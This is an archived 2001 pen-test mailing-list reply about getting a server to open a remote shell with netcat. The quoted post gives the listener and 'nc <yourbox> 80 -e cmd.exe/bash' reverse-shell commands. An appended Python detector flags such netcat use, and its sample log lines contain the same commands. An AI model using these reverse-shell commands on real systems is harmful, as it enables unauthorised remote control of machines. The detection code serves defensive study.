Re: Server initiated remote shell

From: Greg Ardpic (itb@rootshell.be)
Date: 09/22/01


Date: Sat, 22 Sep 2001 13:51:55 +0200 (CEST)
From: Greg Ardpic <itb@rootshell.be>
To: <pen-test@securityfocus.com>
Subject: Re: Server initiated remote shell
Message-ID: <Pine.LNX.4.33.0109221349470.22917-100000@phenix.rootshell.be>

On Fri, 21 Sep 2001, Bill Pennington wrote:
> You want netcat, you can find it on packetstorm.
>
> What you will need to do first is build a CGI/ASP script to upload your
> code, assuming you can't just tftp it from the internal system.
>
> Then on your box execute:
>
> nc -l -p 80
>
> On the remote server execute
>
> nc <yourbox> 80 -e c:\winnt\system32\cmd.exe or /usr/bin/bash or
> whatever command interpreter is handy. You will then see a command prompt
> appear on your local box.
>
> Sounds like the hard part will be getting netcat on the box. Good luck!
>

Does this work on unix machines? I have compiled netcat with
-DGAPING_SECURITY_HOLE (so I could use the -e switch) but had no luck.

itb
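
Added example, not part of either post: a defender-side check that flags process-creation records where netcat is started with the -e switch discussed above and reports the destination it connects out to. The record format (host=, pid=, cmd=), the host names and the sample lines are constructed for this example.

```python
import re
import shlex

NETCAT_NAMES = {"nc", "ncat", "netcat"}
# Assumed record format for this example: host=<name> pid=<n> cmd=<command line>
LINE_RE = re.compile(r"host=(?P<host>\S+) pid=(?P<pid>\d+) cmd=(?P<cmd>.+)$")

def analyze_cmdline(cmdline):
    """Return a finding for a netcat command line that uses -e, else None."""
    argv = shlex.split(cmdline, posix=False)  # posix=False keeps Windows backslashes
    if not argv:
        return None
    exe = re.split(r"[\\/]", argv[0])[-1].lower()   # basename for / or \ paths
    exe = exe[:-4] if exe.endswith(".exe") else exe
    if exe not in NETCAT_NAMES or "-e" not in argv[1:]:
        return None
    positional, program, i = [], None, 1
    while i < len(argv):
        tok = argv[i]
        if tok in ("-e", "-p"):            # options that consume the next token
            if tok == "-e" and i + 1 < len(argv):
                program = argv[i + 1]
            i += 2
            continue
        if not tok.startswith("-"):
            positional.append(tok)         # host and port of an outbound connect
        i += 1
    listening = "-l" in argv
    dest = ":".join(positional[:2]) if not listening and len(positional) >= 2 else None
    return {"mode": "listen" if listening else "outbound", "dest": dest, "program": program}

def scan(lines):
    """Parse process-creation records and collect netcat -e findings."""
    findings = []
    for line in lines:
        m = LINE_RE.match(line.strip())
        finding = analyze_cmdline(m.group("cmd")) if m else None
        if finding:
            findings.append({"host": m.group("host"), "pid": int(m.group("pid")), **finding})
    return findings

# Constructed sample records (format and values are made up for this example).
SAMPLE_LOG = [
    r"host=web01 pid=4120 cmd=C:\tools\nc.exe 203.0.113.5 80 -e c:\winnt\system32\cmd.exe",
    "host=web02 pid=977 cmd=/tmp/nc 203.0.113.5 80 -e /usr/bin/bash",
    "host=ops01 pid=311 cmd=nc -l -p 80",
    "host=ops01 pid=312 cmd=nc -z 10.0.0.8 22",
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f)
```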
